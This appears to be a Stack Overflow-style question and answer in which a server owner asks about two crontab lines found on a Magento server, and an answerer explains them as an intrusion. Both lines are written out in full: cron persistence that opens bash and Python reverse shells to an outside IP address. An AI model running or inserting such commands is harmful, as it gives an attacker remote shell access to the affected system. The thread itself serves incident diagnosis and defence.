# Am I getting hacked? What does these commands do?

Tags: ubuntu, nginx, magento, cron

Consider:

```
crontab -l | { cat; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/80.78.26.82/443 0>&1'"; } | crontab -
crontab -l | { cat; echo "* * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("80.78.26.82",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"; } | crontab -
```

I found this on our [Magento](https://en.wikipedia.org/wiki/Magento) 1.7 server
hosted on AWS with [NGINX](https://en.wikipedia.org/wiki/Nginx) and [Ubuntu](https://en.wikipedia.org/wiki/Ubuntu_%28operating_system%29).

The technology stack is greatly updated, but it is protected by a [Cloudflare](https://en.wikipedia.org/wiki/Cloudflare) firewall.

Comment: I added security rules to the machine to block this ip inbound and outbound.

Comment: Re *"Am I getting hacked?"*: I don't think this is on-topic for Stack Overflow.

Answer (score 1):

I can be wrong, but I think you have been hacked, and the IP address, *80.78.26.82*, belongs to your hacker.

This opens a socket with your hacker:

```py
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("80.78.26.82",443));
```

while

```py
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
```

These three lines essentially redirect the standard input, output, and error streams to the socket that was opened. This means that any input/output to the shell will be sent to the attacker.

```py
p=subprocess.call(["/bin/sh","-i"])
```

Note the `-i` at the end? That opens [Bash](https://en.wikipedia.org/wiki/Bash_%28Unix_shell%29) in interactive mode which will give the hacker access to your Bash shell.

I think you should immediately isolate this server and search for malware in other servers.

I am not a security expert: I don't know if this is correct to do or not. Are you able to ping that IP address from your server? If you can, the firewall has been breached.

Side thought: If your hacker has not already put in the ransomware, perhaps he/she was not yet able to do it or that was not his objective?

Comment: this is what i taught, either he is rerouting traffic or copied Key elements to steal transactions.

Comment: this is what i taught, either he is rerouting traffic or copied Key elements